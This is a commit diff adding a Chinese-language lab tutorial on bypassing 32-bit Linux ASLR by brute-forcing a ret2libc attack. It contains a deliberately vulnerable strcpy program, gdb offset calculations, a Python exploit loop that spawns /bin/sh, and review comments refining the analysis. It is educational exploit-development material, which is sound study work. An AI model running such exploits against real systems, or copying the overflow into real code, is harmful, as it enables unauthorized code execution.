
Commit 3177a46

author
Sn0rt
committed
update: with new post of stack
1 parent b128e14 commit 3177a46

File tree

4 files changed

+961
-0
lines changed


chapter2/README.md

Lines changed: 25 additions & 0 deletions
@@ -1 +1,26 @@
11
# 栈的安全
2+
3+
4+
## 基本的漏洞利用
5+
6+
[format strings on linux32](./format-strings.md)
7+
8+
[Integer-overflow on Linux32](./integer-overflow.md)
9+
10+
[off by one on linux32](./off-by-one.md)
11+
12+
## 对抗基于栈上的安全机制
13+
14+
### NX
15+
16+
[ret2libc bypass nx on linux32](./linux-x86-ret2libc.md)
17+
18+
[rop on Linux32](./linux-x86-rop.md)
19+
20+
[rop chain on linux32](./linux-x86-rop-chain.md)
21+
22+
## ASLR
23+
24+
[got overwrite bypass aslr on linux32](./overwrite-got-bypass-aslr.md)
25+
26+
[brute force bypass aslr on linux32](./brute-force-bypass-aslr.md)
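Review bot: the `## ASLR` heading at new line 22 is one level shallower than `### NX` at line 14, so ASLR renders as a sibling of `## 对抗基于栈上的安全机制` rather than as the second stack-protection mechanism listed under it; change it to `### ASLR` so the two countermeasures sit at the same level. Minor: the link texts mix `linux32` and `Linux32` (lines 8 and 18 against the rest); pick one spelling for the whole list.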

chapter2/brute-force-bypass-aslr.md

Lines changed: 131 additions & 0 deletions
@@ -0,0 +1,131 @@
1+
# 0x00 beginning
2+
3+
记录学暴力破解 32 位 Linux bypass ASLR 的过程, 实验部分来自`sploitfun`[^origin].
4+
5+
>What is brute-force?
6+
7+
在这个技术中攻击者随意选择一个`libc`的基地址来持续攻击直到成功, 这个技术是最简单`bypass`的 ASLR 的方法, 当然需要一定运气.
8+
9+
演示代码如下:
10+
11+
```shell
12+
// gcc -fno-stack-protector
13+
// echo 2 > /proc/sys/kernel/randomize_va_space
14+
15+
#include <stdio.h>
16+
#include <string.h>
17+
18+
int main(int argc, char* argv[]) {
19+
char buf[256];
20+
strcpy(buf,argv[1]);
21+
printf("%s\n",buf);
22+
fflush(stdout);
23+
return 0;
24+
}
25+
```
26+
27+
# 0x01 analysis
28+
29+
当地址随机化开启时候, 发现可以 libc 的每次加载地址都不一样, 但是有规律可循.
30+
31+
```shell
32+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
33+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7580000)
34+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
35+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75c5000)
36+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
37+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7612000)
38+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
39+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb753d000)
40+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
41+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7563000)
42+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
43+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb755a000)
44+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
45+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb757d000)
46+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
47+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75c7000)
48+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
49+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7564000)
50+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
51+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7553000)
52+
```
53+
54+
`libc`随机化只变化 0xb75 后面的两个数字, 因此最大尝试次数 256(2^8) 次时某次随机化的地址总可能又一次被用到, 在下面的`exp`选择`libc`的起始基地址`0xb7595000`进行多次尝试.
55+
56+
# 0x02 how to use?
57+
58+
exp 中 offset 的偏移还是用 peda 套路! offset 是 268.
59+
60+
其中`system_arg`我是利用`libc`中"/bin/sh"相对于`system()`在 libc 中的偏移计算的, 利用 gdb`print`两个然后减法运算就可以, 具体操作如下
61+
62+
```shell
63+
gdb-peda$ p system
64+
1ドル = {<text variable, no debug info>} 0xb7e63190 <__libc_system>
65+
gdb-peda$ searchmem "bin/sh" libc
66+
Searching for 'bin/sh' in: libc ranges
67+
Found 1 results, display max 1 items:
68+
libc : 0xb7f83a25 ("bin/sh")
69+
gdb-peda$ ^Z
70+
[1]+ Stopped gdb -q aslr_2
71+
Sn0rt@warzone:~/lab$ python
72+
Python 2.7.6 (default, Mar 22 2014, 22:59:38)
73+
[GCC 4.8.2] on linux2
74+
Type "help", "copyright", "credits" or "license" for more information.
75+
>>> hex(0xb7f83a25-0xb7e63190)
76+
'0x120895L'
77+
>>>
78+
```
79+
80+
参数填充 exp:
81+
82+
```python
83+
#!/usr/bin/env python
84+
85+
from subprocess import call
86+
from pwn import p32
87+
88+
libc_base_addr = 0xb7595000
89+
exit_offset = 0x000331e0
90+
system_offset = 0x00040190
91+
92+
system_addr = libc_base_addr + system_offset
93+
exit_addr = libc_base_addr + exit_offset
94+
95+
system_arg = system_addr + 0x00120894
96+
97+
payload = "A" * 268 + p32(system_addr) + p32(exit_addr) + p32(system_arg)
98+
99+
i = 0
100+
while (i < 256):
101+
print "Number of tries: %d" %i
102+
ret = call(["./aslr_2", payload])
103+
i += 1
104+
```
105+
其实这里 exp 已经完成了, 不过如果成功过后有点扫尾工作需要做, 把尾部加上
106+
107+
```python
108+
ret = call(["./aslr_2", payload])
109+
i += 1
110+
if (not ret):
111+
break
112+
else:
113+
print "Exploit failed"
114+
```
115+
116+
```shell
117+
...
118+
Number of tries: 79
119+
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�Q]���\�$Zo
120+
$ uid=1042(Sn0rt) gid=1043(Sn0rt) groups=1043(Sn0rt)
121+
$
122+
```
123+
需要多运行几次, 有时候会执行失败, 或者执行成功没有会显示.
124+
125+
# 0x03 doubt
126+
127+
这个技术利用了在同一个`libc`文件中函数偏移是相对的构造出 shellcode, 因此我填写的`libc`基地址又一次命中, 下面攻击就水到渠成, 按照理论这个脚本一次就可以命中`libc`, 为什么需要多次执行才能 get shell?
128+
129+
### reference
130+
131+
[^origin]: [sploitfun](https://sploitfun.wordpress.com/2015/05/08/bypassing-aslr-part-ii/)
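Review bot: the claim at new line 54 that randomization only changes the two hex digits after `0xb75`, and that an address is therefore bound to repeat within 256 tries, is contradicted by the listing above it: `0xb7612000` at line 37 is not of the form `0xb75xxxxx`. What the ten samples actually show is a libc base that moves in page (0x1000) steps within a range of under 1 MiB (`0xb753d000` to `0xb7612000`), i.e. the 8 bits of mmap entropy a 32-bit kernel gives; a fixed guess such as `0xb7595000` therefore hits with probability 1/256 on each independent run, and 256 attempts give about 1 - (255/256)^256, roughly 63%, not a guarantee. Stating it that way also answers the question in `0x03 doubt` at line 127: the offsets inside libc are constant, but the guessed base only matches on about one run in 256, so the 79 tries in the transcript are a lucky draw and several runs of the script are expected. Three smaller points: the fence at line 11 is tagged `shell` but holds C, tag it `c`; line 95 hard-codes `0x00120894` while the gdb arithmetic at line 76 yields `0x120895`, so say explicitly that the one-byte step back moves from the `bin/sh` hit at `0xb7f83a25` to the leading `/`, giving `system()` the string `/bin/sh`; and the `if (not ret): break` test at lines 110-111 is unreliable, because on a wrong guess the target segfaults and `subprocess.call` returns `-11` (truthy, so the loop continues as intended), but on a hit the chain's `system_arg` lands in `exit()`'s return-address slot, not its argument slot, so the exit status is whatever happens to lie on the stack beyond the payload and `not ret` may or may not fire; either note that the status is uncontrolled or let the spawned shell be the success signal and drop the check.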
